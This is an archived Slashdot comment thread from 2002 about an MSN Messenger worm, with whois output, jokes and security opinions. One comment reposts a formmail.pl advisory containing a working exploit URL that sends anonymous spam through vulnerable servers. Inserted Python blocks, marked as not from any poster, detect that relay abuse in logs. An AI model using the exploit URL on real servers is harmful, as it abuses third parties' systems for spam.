other crap added below to avoid "postercomment" compression filter, because obviously compression isn't a way to catch the real trolls, since it caught me, but hasn't caught the ascii art allready attached to the story. 45908-6230569laksdflkjn ;l34j65] lksdjflkaj -908ausdfg0 oi;3lkj4;6lkn3 56;o38tusap[df8u opsiajd ;alskdjtl3k4jl5kj345;1l 4jlwkjf l;kj a
Hope that's enough to get it through the filter this time.

Re:No DNS Record? (Geeky Observations) (0)

Anonymous Coward | more than 12 years ago | (#3004152)

How about using whois correctly?

$ whois masenko-media.net
[whois.crsnic.net]

Whois Server Version 1.3

Domain names in the .com, .net, and .org domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

Domain Name: MASENKO-MEDIA.NET
Registrar: GO DADDY SOFTWARE, INC.
Whois Server: whois.godaddy.com
Referral URL: http://registrar.godaddy.com
Name Server: NS1.NETCRATER.COM
Name Server: NS2.NETCRATER.COM
Updated Date: 06-feb-2002

>>> Last update of whois database: Wed, 13 Feb 2002 17:06:43 EST

and then if you ask specifically from that registrar:


[whois.godaddy.com]
The data contained in Go Daddy Software, Inc.'s WHOIS database,
while believed by the company to be reliable, is provided "as is"
with no guarantee or warranties regarding its accuracy. This
information is provided for the sole purpose of assisting you
in obtaining information about domain name registration records.
Any use of this data for any other purpose, including, but not
limited to, allowing or making possible dissemination or
collection of this data in part or in its entirety for any
purpose, such as the transmission of unsolicited advertising and
solicitations, is expressly forbidden without the prior written
permission of Go Daddy Software, Inc. By submitting an inquiry,
you agree to these terms of usage and limitations of warranty.

Registrant:
Net Crater
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States

Registrar: Go Daddy Software (http://registrar.godaddy.com)
Domain Name: MASENKO-MEDIA.NET
Created on: 06-Feb-02
Expires on: 06-Feb-03
Last Updated on: 06-Feb-02

Administrative Contact:
Crater, Net domains@netcrater.com
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States
3365917696
Technical Contact:
Crater, Net domains@netcrater.com
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States
3365917696

Domain servers in listed order:
NS1.NETCRATER.COM
NS2.NETCRATER.COM

Re:No DNS Record? (Geeky Observations) (1)

The Salamander (56587) | more than 12 years ago | (#3004157)

Your WHOIS must suck:

Registrant:
Net Crater
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States

Registrar: Go Daddy Software (http://registrar.godaddy.com)
Domain Name: MASENKO-MEDIA.NET
Created on: 06-Feb-02
Expires on: 06-Feb-03
Last Updated on: 06-Feb-02

Administrative Contact:
Crater, Net domains@netcrater.com
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States
3365917696
Technical Contact:
Crater, Net domains@netcrater.com
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States
3365917696

Domain servers in listed order:
NS1.NETCRATER.COM
NS2.NETCRATER.COM

Re:No DNS Record? (Geeky Observations) (0)

suwain_2 (260792) | more than 12 years ago | (#3004179)

Actually... My DNS doesn't suck, it's me. :-[

I, in my stupidity, kept the "www." on the front, even though it shouldn't have been. :)

Re:No DNS Record? (Geeky Observations) (0)

Anonymous Coward | more than 12 years ago | (#3004164)

whois is for domain names, not host names. Removing the www gives the correct info.

whois masenko-media.net
[whois.crsnic.net]

Whois Server Version 1.3

Domain names in the .com, .net, and .org domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

Domain Name: MASENKO-MEDIA.NET
Registrar: GO DADDY SOFTWARE, INC.
Whois Server: whois.godaddy.com
Referral URL: http://registrar.godaddy.com
Name Server: NS1.NETCRATER.COM
Name Server: NS2.NETCRATER.COM
Updated Date: 06-feb-2002

>>> Last update of whois database: Wed, 13 Feb 2002 17:06:43 EST

The Registry database contains ONLY .COM, .NET, .ORG, .EDU domains and
Registrars.

[whois.godaddy.com]
The data contained in Go Daddy Software, Inc.'s WHOIS database,
while believed by the company to be reliable, is provided "as is"
with no guarantee or warranties regarding its accuracy. This
information is provided for the sole purpose of assisting you
in obtaining information about domain name registration records.
Any use of this data for any other purpose, including, but not
limited to, allowing or making possible dissemination or
collection of this data in part or in its entirety for any
purpose, such as the transmission of unsolicited advertising and
solicitations, is expressly forbidden without the prior written
permission of Go Daddy Software, Inc. By submitting an inquiry,
you agree to these terms of usage and limitations of warranty.

Registrant:
Net Crater
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States

Registrar: Go Daddy Software (http://registrar.godaddy.com)
Domain Name: MASENKO-MEDIA.NET
Created on: 06-Feb-02
Expires on: 06-Feb-03
Last Updated on: 06-Feb-02

Administrative Contact:
Crater, Net domains@netcrater.com
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States
3365917696
Technical Contact:
Crater, Net domains@netcrater.com
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States
3365917696

Domain servers in listed order:
NS1.NETCRATER.COM
NS2.NETCRATER.COM
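The two-step lookup shown in the comments above (strip the host label, ask the registry, then follow its "Whois Server" referral to the registrar), as an added example that is not part of any poster's comment. The function names are hypothetical, the last-two-labels rule is an assumption that only holds for single-label TLDs such as .net, and the sample reply is constructed from the registry output quoted in the thread.

```python
import socket

# Constructed from the registry reply quoted in the thread.
REGISTRY_REPLY = """\
Domain Name: MASENKO-MEDIA.NET
Registrar: GO DADDY SOFTWARE, INC.
Whois Server: whois.godaddy.com
Referral URL: http://registrar.godaddy.com
Name Server: NS1.NETCRATER.COM
Name Server: NS2.NETCRATER.COM
Updated Date: 06-feb-2002
"""

def registrable_domain(host):
    """Drop host labels so the query names the domain, not a host in it.
    Assumption: single-label TLD; suffixes such as .co.uk need a
    public-suffix list instead."""
    labels = host.strip().rstrip(".").lower().split(".")
    if len(labels) < 2 or not all(labels):
        raise ValueError(f"not a domain name: {host!r}")
    return ".".join(labels[-2:])

def parse_registry_reply(text):
    """Collect 'Key: value' lines; repeated keys (Name Server) become lists."""
    record = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if not sep or not value.strip():
            continue
        record.setdefault(key.strip().lower(), []).append(value.strip())
    return record

def next_query(host, registry_reply):
    """Return (server, query) for the second, registrar-level lookup."""
    record = parse_registry_reply(registry_reply)
    domain = registrable_domain(host)
    listed = [d.lower() for d in record.get("domain name", [])]
    if domain not in listed:
        raise LookupError(f"registry reply does not cover {domain}")
    servers = record.get("whois server")
    if not servers:
        raise LookupError("no registrar referral in registry reply")
    return servers[0], domain

def whois_query(server, query, timeout=10):
    """RFC 3912: send the query plus CRLF to TCP port 43, read until close."""
    with socket.create_connection((server, 43), timeout=timeout) as s:
        s.sendall(query.encode("ascii") + b"\r\n")
        chunks = []
        while (data := s.recv(4096)):
            chunks.append(data)
    return b"".join(chunks).decode("latin-1")
```

`whois_query` is the only function that touches the network; the parsing functions run offline against the embedded reply.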

Mod Parent Troll DOWN!!!! (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#3004178)

this luzer used WWW, they didn't whois it right, the domain exists

whoever modded this luzer up was smoking crack

Re:No DNS Record? (Geeky Observations) (-1)

Anonymous Coward | more than 12 years ago | (#3004188)

I just wish SOMEONE, ANYONE would run a whois using just masenko-media.net and post the results to slashdot.

Anyone? Anyone at all?

Re:No DNS Record? (Geeky Observations) (-1)

Anonymous Coward | more than 12 years ago | (#3004229)

It's like everyone and their dog must post the correct whois results... Kinda funny...

possibly try (0)

Papst (529453) | more than 12 years ago | (#3004200)

whois masenko-media.net

Re:No DNS Record? (Geeky Observations) (0)

Anonymous Coward | more than 12 years ago | (#3004212)

Amazingly, the address [yahoo.com] looks like it is legit.

It's really an IE virus (1, Redundant)

_fuzz_ (111591) | more than 12 years ago | (#3004101)

The MSN Messenger protocol has nothing in it that would allow the retrieval of contacts, etc. (I've implemented a Java library that speaks msn messenger: MSNj [sourceforge.net] (shameless plug)). The protocol isn't any more or less secure than HTTP.

The virus probably just gets the COM object that their messenger implements through javascript. The security hole is that IE lets a web page talk to the messenger client. I would guess that it does that so you can add contacts by clicking on web links and stuff like that.

Finally! (5, Funny)

digitalcowboy (142658) | more than 12 years ago | (#3004106)

I've been reluctant to use the MS IM client because it didn't appear they had fully integrated its virus abilities with all their other software. Now that it's part of a fully integrated Microsoft Virus Productivity Suite, I'm ready!

Can anybody tell me where I can sign up for one of those Passport Universal Identifier and Cybercash Wallets and get the MS implant in my right hand or forehead?

It works by: (0)

Anonymous Coward | more than 12 years ago | (#3004107)

using the document.open bug in IE. Details of which were first published Here [tom.me.uk]. Users of third party clients are not affected [trillian.cc]. -H2

Microsoft Article Virus Sweeps Slashdot (3, Funny)

guttentag (313541) | more than 12 years ago | (#3004111)

Four entries in the Microsoft topic [slashdot.org] in one day?
  1. Microsoft Instant Messenger Virus Sweeps Net [slashdot.org]
  2. What is .NET? [slashdot.org]
  3. States Demand Windows Source Code [slashdot.org]
  4. Details of MSFT's Antitrust Lobbying [slashdot.org]
There were none yesterday, or the day before... the calm before the storm...

FUCK OFF (-1, Troll)

Anonymous Coward | more than 12 years ago | (#3004113)

Fuck off slashdot you fucking useless asshole mother fuckers.

It's only a matter of time... (4, Insightful)

Max the Merciless (459901) | more than 12 years ago | (#3004122)

until someone unleashes a virus that does some serious damage. If I was a "terrorist" hell bent on punishing the Western world for whatever perceived sins, I'd be learning how to make, or hiring programmers, to unleash a truly destructive virus.

It's been said many times before, but I'll say it again, any monoculture is far more vulnerable to attack than a diverse system. Relying on one system, be it Microsoft or even Linux, is foolish.

The destruction of the Microsoft monopoly is not just a matter of helping improve competition, it is a serious security matter. No amount of campaign donations or legal semantics should distract the government from its task of providing security.

Re:It's only a matter of time... (0)

Anonymous Coward | more than 12 years ago | (#3004141)

Get real!

It's a microsoft ruse! (0)

SweetAndSourJesus (555410) | more than 12 years ago | (#3004131)

Fired up Messenger for the first time ever, just hoping I get to see this. It's all a microsoft conspiracy to get slashdotters using their product.

worm primer (2, Interesting)

elbobo (28495) | more than 12 years ago | (#3004133)

just gave it a go, and it didn't affect me. running winxp with netcaptor [netcaptor.com] browser (embeds ie) and trillian [trillian.cc] (im client that connects to the msn messenger network among others)

not that i was expecting it to work.

what amuses me though, is how the linked page from this article reads like a very handy worm writing primer, suggesting better propagation methods -

Optimized scanning routines, hitlist scanning, and permutation scanning can be combined to produce hyper virulent Warhol Worms. Since they are so fast, such worms would be the vehicle of choice for delivering malicious payloads to the net at large.

This is dumber than a mail worm (3, Insightful)

J.D. Hogg (545364) | more than 12 years ago | (#3004136)

I would be impressed to see a worm silently infect your machine and try to infect your contacts. But this one asks you to *click a url* ?? Anybody who doesn't dismiss a message with a URL or an attachment from somebody they don't know, whether it's in an instant message or an email, deserves to be infected (and also should have their computers taken away from them and a flyer explaining to them why they shouldn't talk to strangers in the street given to them instead).

But /. is right, it is a Warhol virus : all the posters who reported this non-news got their 15 minutes of fame on Slashdot.

Re:This is dumber than a mail worm (2, Informative)

joemiah (2398) | more than 12 years ago | (#3004198)

It spreads through your contacts, so the recipients are more than likely receiving the URL from someone they know.

Re:This is dumber than a mail worm (2, Informative)

CrayzyJ (222675) | more than 12 years ago | (#3004220)

"somebody they don't know"

It says that the virus sends the msg to people in the contact list. Hence, you'd get messages from your friends/family/whatever.

Karma Suicide! (-1, Troll)

jeffy124 (453342) | more than 12 years ago | (#3004137)

After 600+ posts and 20 articles, my karma has been peaked at 50 for what seems like forever now. My new campaign: Karma Suicide!! Every post from now until my karma's back at zero will be this short crapflood posted with my +1 bonus. So moderators: Do your worst! You got only 17 more points to go! Mod me troll/OT/Overrated/Whatever to get my karma back to where it began. Do this ASAP! And as for the rest of you, commit karma suicide today!

Not that URL (2)

phliar (87116) | more than 12 years ago | (#3004139)

Was that just an example URL?


GET /cool.html HTTP/1.1
Host: www.masenko-media.net
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Win32)

HTTP/1.1 404 Not Found
Date: Thu, 14 Feb 2002 00:07:30 GMT
Server: Apache/1.3.20 (Unix) mod_bwlimited/0.8 PHP/4.0.6 DAV/1.0.2 mod_log_bytes/0.3 FrontPage/5.0.2.2510 mod_ssl/2.8.4 OpenSSL/0.9.6
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /cool.html was not found on this server.<P>
<P>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.
<HR>
<ADDRESS>Apache/1.3.20 Server at www.masenko-media.net Port 80</ADDRESS>
</BODY></HTML>

(No Micros**t anywhere on these machines. Cheers!)

404 error (1)

skt (248449) | more than 12 years ago | (#3004145)

I suggest not following the link.

hmm, I went to that link and got a 404 error.. nothing to worry about if you use mozilla, but how can this do something bad to IE? Did they take the page down?

One shoe drops (5, Interesting)

Anonymous Coward | more than 12 years ago | (#3004163)

Well, this is one of a number of Damoclean swords hanging over the Net. A couple of other widely predicted "what if..?"s have already come to pass: Nimda was the first successful implementation of one, attacking through multiple vulnerabilities; others would include yesterday's SNMP freakout, the separate possibility of routing protocol attacks, yadda yadda, oh look... you all read bugtraq|incidents|nanog, et al., and know the score, and are presumably not very vulnerable. (Although one especially interesting aspect of this and other worms is that it defeats the security posture that says "take yourself out of the top 10% of easy sites to break into [by, eg., ONLY implementing the SANS top 10/20 fixes] and the kiddies will pass you by". If you're vulnerable, you WILL be hit. ) "But I haven't got anything worth taking, why would anyone want to crack me?" *sigh*...


The thing that gets me is that NOTHING MAKES ANY DIFFERENCE. Web defacements - make no difference. ILoveYou - no effect. Melissa: nada, Nimda - plus ca change, plus ca la meme chose. Code Red? code schmed. The PHBs seem quite happy to just reformat, reinstall, count it as a cost of doing business on the net, and forget any lessons less stupid people might learn.


Don't believe me? check out the IIS curve at Netcraft [netcraft.com] . What happened after Nimda and Code Red? IIS usage INCREASED.

Mebbe I'm just bitter cos I've been trying to break into info-sec work for the last few years and getting nowhere cos I haven't an MCSE|CCNA|CISSP|security clearance, although I can usually spot half a dozen glaring holes in a setup within a few hours. (actually I interviewed at a "leading security firm" once & was given an automated test: I couldn't help noticing the machine I was given was logged in as NT Domain Admin. No, it wasn't a double-bluff test of my ethics!)

Er... well, yes, I AM bitter; but that doesn't change the fact that there are an awful lot of clueless gimps out there managing (techs who manage) networks and network-connected systems.
It seems to me that nothing short of a totally 100% evil malware that nukes HDs after silently & terminally corrupting backups for a few weeks will hit enough people where it counts - their wallets - to make any difference to the importance placed on info-sec in the vast majority of places.

Another site (0)

Anonymous Coward | more than 12 years ago | (#3004172)

http://www.angelfire.com/zine2/me1 . It appears to launch a fake error page.

formmail.pl (5, Informative)

TheFlu (213162) | more than 12 years ago | (#3004177)

Just an FYI about the lack of security on older versions of formmail.pl. You should replace the exploitable version, if you are using it yourself.

Formmail.pl Can Be Used As An Open Mail Relay

Summary
The CGI program Formmail.pl lacks adequate security checks and allows spammers to send anonymous e-mail using vulnerable hosts as mail relays.
This vulnerability has already been exploited by spammers in many installations of Formmail.pl.

Details
Matt Wright's formmail.pl program does a "security check" on the HTTP_REFERER server variable. The security check is usually used to verify that information submitted from a form came from a proper or designated domain. This is usually done to prevent someone from creating a local, malicious form to submit to a script. This can be easily bypassed by passing a raw HTTP request, and faking the HTTP Referrer. This script also allows you to set the recipient's email address in the form. These two factors allow a malicious user to use the formmail.pl program to distribute their email (SPAM).

Exploit:
A URL such as the following:
http://www.example.com/cgi-bin/FormMail.pl?recipient=email@address-to-spam.com&message=Proof%20that%20FormMail.pl%20can%20be%20used%20to%20send%20anonymous%20spam.

Will send an anonymous e-mail if the installed FormMail.pl is vulnerable.

Workaround:
1. Remove your formmail.pl script until the author provides a fix.
or:
2. Hard code the recipient's email address in the formmail.pl program. Do not rely on the address submitted by the user.

It could be worse... (4, Funny)

Cowculator (513725) | more than 12 years ago | (#3004191)

"Go To http://www.goatse.cx NoW !!!"

Imagine if your friends suddenly knew not only that you were gullible enough to fall for a virus like that, but that you had seen that site...

So THAT's where the formmail.pl requests (2)

SCHecklerX (229973) | more than 12 years ago | (#3004197)

are from!!!


I know that formmail.pl has some vulnerabilities, and figured people were just probing me.


This would explain where it is coming from. Add this to the code red etc that my poor little web server on DSL has to deal with :(
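A log check for the relay abuse described in the formmail.pl advisory and the probes mentioned in the comment above, as an added example that is not part of either post or of FormMail itself. It flags FormMail requests whose `recipient` parameter names an address outside the site's own allow-list, regardless of what the Referer header claims. The allow-list address, the Apache "combined" log format and the sample lines are assumptions constructed for the example, and only GET requests are visible this way because POST bodies are not logged.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: the only address this site's form is meant to mail.
ALLOWED_RECIPIENTS = {"webmaster@example.com"}

# Apache "combined" log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [14/Feb/2002:00:07:30 +0000] "GET /cgi-bin/FormMail.pl?recipient=webmaster@example.com&message=hi HTTP/1.0" 200 512 "http://www.example.com/contact.html" "Mozilla/4.0"
198.51.100.7 - - [14/Feb/2002:00:09:02 +0000] "GET /cgi-bin/FormMail.pl?recipient=victim@example.net&message=test HTTP/1.0" 200 498 "http://www.example.com/contact.html" "-"
198.51.100.7 - - [14/Feb/2002:00:09:05 +0000] "GET /cgi-bin/formmail.pl?recipient=a@example.org,b@example.org&subject=x HTTP/1.0" 404 210 "-" "-"
203.0.113.5 - - [14/Feb/2002:00:10:11 +0000] "GET /index.html HTTP/1.0" 200 1024 "-" "Mozilla/4.0"
"""

def find_relay_attempts(log_text, allowed=ALLOWED_RECIPIENTS, site="www.example.com"):
    """Return one finding per FormMail request naming an outside recipient."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if not url.path.lower().endswith("/formmail.pl"):
            continue
        # Treat a comma-separated value as several recipients.
        recipients = [
            r.strip().lower()
            for value in parse_qs(url.query).get("recipient", [])
            for r in value.split(",") if r.strip()
        ]
        outside = [r for r in recipients if r not in allowed]
        if outside:
            findings.append({
                "ip": m["ip"],
                "status": int(m["status"]),  # 200 means the script ran
                "recipients": outside,
                # Client-supplied header: a local-looking value proves nothing.
                "referer_looks_local": site in m["referer"],
            })
    return findings
```

A finding with status 200 and `referer_looks_local` set is the case the advisory warns about: the Referer check passed and the script still mailed an outside address.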

Warhol Virus (1)

Metrollica (552191) | more than 12 years ago | (#3004201)

To me this sounds like Code Red, only speeded up so it could do a lot more scans in a much shorter period of time and infect many more computers. The author must be a bit more experienced than the author of Code Red because they have built in multithreading which wasn't in Code Red. This makes it possible to probe and attack multiple machines at once and even begins by attacking a list of 50,000 machines known to have good internet connections.

Have any A/V Companies... (3, Informative)

lblack (124294) | more than 12 years ago | (#3004206)

Have any A/V companies deployed products to protect against instant messaging vulnerabilities? I know that Bitdefender [bitdefender.com] have a product that helps to increase your security when running such services, but I haven't heard of similar things from Norton/McAfee.

I always thought this was kinda silly, waiting for the horse to leave before closing the stable. Did anybody not view Instant Messenger traffic, especially once it got into a high level of file transfer interaction, as not being a platform for the deployment of viruses?

Still, this is a social engineering thing more than it is anything else. It's not even really a virus -- it's a piece of destructive code delivered via social engineering. It is not really self-propagating, though, in that it requires the server-side in order to be malicious, or do anything at all.

That seems to me to be stretching "virus" a bit. Maybe "viral meme"? I agree it does spread a bit like a virus, but it actually requires fetching external information.

-l

P.S. Bitdefender are beta'ing a Linux product, by the way. It's not Open, but the beta is a free (as in beer) download. Disclaimer: I'm a fan of that company. ;)

go to the web site i dare you :) (0)

Anonymous Coward | more than 12 years ago | (#3004219)

how many linux users have actually gone to the web site just for fun????

See you at school? (-1, Offtopic)

Omega (1602) | more than 12 years ago | (#3004234)

Anna says:
See you at Masenko-Media!